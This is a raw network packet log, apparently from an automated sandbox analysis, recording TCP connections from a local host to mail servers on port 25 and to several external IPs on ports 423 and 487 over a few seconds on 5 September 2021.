Sep 5, 2021 15:50:50.970721006 CEST	50118	25	192.168.2.4	67.219.246.204
Sep 5, 2021 15:50:50.977401972 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.009607077 CEST	50112	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.009622097 CEST	50113	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.027544022 CEST	50123	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.027968884 CEST	50124	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.079915047 CEST	423	50112	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.080028057 CEST	50112	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.095326900 CEST	423	50123	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.095469952 CEST	50123	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.099961042 CEST	423	50124	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.100105047 CEST	50124	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.110208988 CEST	25	50118	67.219.246.204	192.168.2.4
Sep 5, 2021 15:50:51.118999958 CEST	50117	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.119501114 CEST	50125	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.121315956 CEST	423	50113	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.143491983 CEST	25	50116	35.162.106.154	192.168.2.4
Sep 5, 2021 15:50:51.152004004 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:51.155863047 CEST	423	50113	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.156016111 CEST	50113	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.160773993 CEST	423	50117	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.160901070 CEST	50117	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.161485910 CEST	423	50125	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.161607027 CEST	50125	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.162590027 CEST	423	50123	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.172740936 CEST	423	50124	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.191301107 CEST	50123	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.191539049 CEST	50124	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.197097063 CEST	50088	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:51.204263926 CEST	423	50125	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.204570055 CEST	50125	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.234837055 CEST	50126	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:51.235534906 CEST	50127	25	192.168.2.4	144.160.159.22
Sep 5, 2021 15:50:51.244033098 CEST	50119	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.244541883 CEST	50128	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.246727943 CEST	423	50125	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.258241892 CEST	423	50123	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.266606092 CEST	423	50124	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.269498110 CEST	423	50119	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.269530058 CEST	423	50128	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.269594908 CEST	50119	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.269680977 CEST	50128	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.271725893 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.282222986 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.290796041 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:51.294981003 CEST	423	50128	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.295264959 CEST	50128	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.320178032 CEST	423	50128	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.353405952 CEST	50121	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:51.353431940 CEST	50122	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.353946924 CEST	50129	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:51.354438066 CEST	50130	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.384989977 CEST	423	50122	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.385077000 CEST	50122	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.385622978 CEST	423	50130	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.385709047 CEST	50130	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.398344040 CEST	25	50126	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:51.398452997 CEST	50126	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:51.410183907 CEST	25	50127	144.160.159.22	192.168.2.4
Sep 5, 2021 15:50:51.410295010 CEST	50127	25	192.168.2.4	144.160.159.22
Sep 5, 2021 15:50:51.416779995 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.416863918 CEST	423	50130	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.417047024 CEST	50130	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.421310902 CEST	423	50121	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:51.421410084 CEST	50121	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:51.423705101 CEST	423	50129	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:51.423790932 CEST	50129	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:51.428924084 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:51.447796106 CEST	423	50130	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.493743896 CEST	423	50129	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:51.493985891 CEST	50129	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:51.554603100 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.563473940 CEST	423	50129	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:51.579808950 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:51.603401899 CEST	50123	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.603456020 CEST	50124	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.603509903 CEST	50125	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.603513956 CEST	50128	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.603971958 CEST	50131	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.604377985 CEST	50132	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.604779959 CEST	50133	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.605441093 CEST	50134	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.607067108 CEST	25	50126	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:51.624119997 CEST	50126	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:51.629756927 CEST	423	50128	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.629882097 CEST	50128	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.632076979 CEST	423	50134	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.632174969 CEST	50134	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.643878937 CEST	25	50127	144.160.159.22	192.168.2.4
Sep 5, 2021 15:50:51.646873951 CEST	423	50133	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.646907091 CEST	423	50125	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.647013903 CEST	50133	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.647058010 CEST	50125	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.656467915 CEST	50127	25	192.168.2.4	144.160.159.22
Sep 5, 2021 15:50:51.658421040 CEST	423	50134	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.658669949 CEST	50134	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:51.672132015 CEST	423	50123	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.672244072 CEST	50123	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.674982071 CEST	423	50132	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.675097942 CEST	50132	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.676317930 CEST	423	50124	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.676390886 CEST	50124	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.676898003 CEST	423	50131	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.676983118 CEST	50131	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.683932066 CEST	423	50134	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:51.689687014 CEST	423	50133	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.689908028 CEST	50133	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:51.714266062 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:51.728378057 CEST	50130	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.728852034 CEST	50136	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.731002092 CEST	423	50133	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:51.738543987 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.745038033 CEST	423	50132	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.745817900 CEST	50132	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:51.749061108 CEST	423	50131	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.749291897 CEST	50131	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:51.755815983 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.759398937 CEST	423	50130	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.759450912 CEST	423	50136	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.759609938 CEST	50130	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.759676933 CEST	50136	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.781145096 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:51.781321049 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:51.787892103 CEST	25	50126	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:51.787961006 CEST	25	50126	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:51.789019108 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:51.790467978 CEST	423	50136	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.790723085 CEST	50136	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:51.796741962 CEST	50126	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:51.814963102 CEST	423	50132	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:51.820921898 CEST	423	50131	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:51.821243048 CEST	423	50136	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:51.831669092 CEST	25	50127	144.160.159.22	192.168.2.4
Sep 5, 2021 15:50:51.831698895 CEST	25	50127	144.160.159.22	192.168.2.4
Sep 5, 2021 15:50:51.840154886 CEST	50127	25	192.168.2.4	144.160.159.22
Sep 5, 2021 15:50:51.865376949 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:51.865653992 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:51.908250093 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.908289909 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.908313990 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.908339977 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:51.908379078 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:51.932441950 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:51.960443020 CEST	25	50126	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:51.960473061 CEST	25	50126	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:51.960628033 CEST	50126	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:51.974467039 CEST	50126	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:51.993894100 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:51.997730017 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:51.997788906 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.009727955 CEST	50129	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.010349035 CEST	50137	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.014435053 CEST	25	50127	144.160.159.22	192.168.2.4
Sep 5, 2021 15:50:52.027457952 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:52.064579964 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.064625025 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.064651012 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.077225924 CEST	423	50137	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:52.077395916 CEST	50137	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.079437017 CEST	423	50129	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:52.079523087 CEST	50129	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.087773085 CEST	50127	25	192.168.2.4	144.160.159.22
Sep 5, 2021 15:50:52.137695074 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.137747049 CEST	25	50126	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:52.144699097 CEST	423	50137	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:52.192898989 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:52.197189093 CEST	50137	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.197312117 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.218080997 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.218498945 CEST	50137	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.236244917 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.236490011 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.236701965 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.236876011 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.237109900 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.245601892 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.245727062 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:52.245857954 CEST	50138	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:52.245898962 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.248424053 CEST	50127	25	192.168.2.4	144.160.159.22
Sep 5, 2021 15:50:52.284962893 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.285485983 CEST	423	50137	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:52.303210974 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.303247929 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.303405046 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.303433895 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.303738117 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.312563896 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.312602043 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.337840080 CEST	50133	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.337865114 CEST	50134	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.338402033 CEST	50139	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.338833094 CEST	50140	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.363272905 CEST	423	50134	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:52.363394976 CEST	50134	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.364037037 CEST	423	50140	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:52.364137888 CEST	50140	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.366743088 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:52.369335890 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.369548082 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.369632006 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.369733095 CEST	50135	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:52.369797945 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:52.369891882 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:52.369962931 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:52.379538059 CEST	423	50139	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:52.379684925 CEST	50139	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.379771948 CEST	423	50133	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:52.379867077 CEST	50133	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.390090942 CEST	423	50140	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:52.407779932 CEST	25	50138	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:52.407908916 CEST	50138	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:52.422748089 CEST	423	50139	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:52.422782898 CEST	25	50127	144.160.159.22	192.168.2.4
Sep 5, 2021 15:50:52.422867060 CEST	50127	25	192.168.2.4	144.160.159.22
Sep 5, 2021 15:50:52.436508894 CEST	487	50135	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:52.478446960 CEST	50139	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.494076014 CEST	50140	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.497961044 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:52.507931948 CEST	50140	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.508373976 CEST	50139	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.508883953 CEST	50141	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:52.508981943 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:52.533062935 CEST	423	50140	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:52.549479008 CEST	423	50139	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:52.562302113 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:52.562458038 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:52.617999077 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:52.619339943 CEST	25	50141	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:52.619462967 CEST	50141	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:52.630287886 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:52.666244030 CEST	50131	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:52.666290998 CEST	50132	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:52.666306019 CEST	50136	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:52.666838884 CEST	50143	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:52.667273045 CEST	50144	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:52.667751074 CEST	50145	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:52.683641911 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:52.686166048 CEST	25	50138	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:52.687629938 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:52.696114063 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:52.697014093 CEST	423	50136	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:52.697103977 CEST	50136	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:52.698977947 CEST	50138	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:52.700444937 CEST	423	50145	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:52.700563908 CEST	50145	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:52.717525959 CEST	25	50088	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:52.717670918 CEST	50088	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:52.734018087 CEST	423	50145	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:52.734312057 CEST	50145	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:52.734347105 CEST	423	50143	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:52.734477043 CEST	50143	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:52.735080004 CEST	423	50144	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:52.735208035 CEST	50144	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:52.735558033 CEST	423	50132	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:52.735636950 CEST	50132	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:52.738105059 CEST	423	50131	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:52.738174915 CEST	50131	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:52.751487970 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:52.764081001 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:52.767911911 CEST	423	50145	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:52.791874886 CEST	25	50141	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:52.792231083 CEST	25	50141	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:52.792287111 CEST	50141	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:52.803903103 CEST	423	50143	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:52.804115057 CEST	50143	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:52.804816961 CEST	423	50144	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:52.804958105 CEST	50144	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:52.807693005 CEST	50141	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:52.823384047 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:52.837868929 CEST	50137	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.838375092 CEST	50146	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.862251043 CEST	25	50138	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:52.863137960 CEST	25	50138	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:52.871442080 CEST	50138	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:52.871937037 CEST	423	50144	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:52.872167110 CEST	423	50143	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:52.907371044 CEST	423	50137	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:52.907511950 CEST	50137	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.917834997 CEST	423	50146	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:52.917958021 CEST	50146	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.918052912 CEST	25	50141	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:52.978559017 CEST	50139	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.978621006 CEST	50140	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.979082108 CEST	50147	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:52.979562044 CEST	50148	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:52.996362925 CEST	423	50146	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:52.996572018 CEST	50146	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:52.998394012 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.004117966 CEST	423	50140	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.004231930 CEST	50140	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.004800081 CEST	423	50148	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.004960060 CEST	50148	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.020251989 CEST	423	50139	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.020292044 CEST	423	50147	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.020385981 CEST	50139	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.020397902 CEST	50147	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.028017044 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.031235933 CEST	423	50148	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.031476974 CEST	50148	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.033910036 CEST	25	50138	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:53.033941031 CEST	25	50138	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:53.034073114 CEST	50138	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:53.047770023 CEST	50138	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:53.056679010 CEST	423	50148	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.062092066 CEST	423	50147	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.062347889 CEST	50147	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.074385881 CEST	423	50146	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:53.081437111 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.082022905 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.104475975 CEST	423	50147	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.112113953 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.134850025 CEST	50145	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.135339975 CEST	50149	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.157418966 CEST	50150	25	192.168.2.4	104.47.22.161
Sep 5, 2021 15:50:53.165740013 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.165787935 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.165812969 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.165837049 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.165860891 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.166244984 CEST	423	50149	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.166347027 CEST	50149	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.166837931 CEST	423	50145	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.167009115 CEST	50145	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.197618008 CEST	423	50149	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.197786093 CEST	50149	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.197868109 CEST	50143	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:53.197896957 CEST	50144	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:53.198379993 CEST	50151	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:53.198765993 CEST	50152	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:53.199048996 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.199127913 CEST	50150	25	192.168.2.4	104.47.22.161
Sep 5, 2021 15:50:53.209831953 CEST	25	50138	67.195.228.106	192.168.2.4
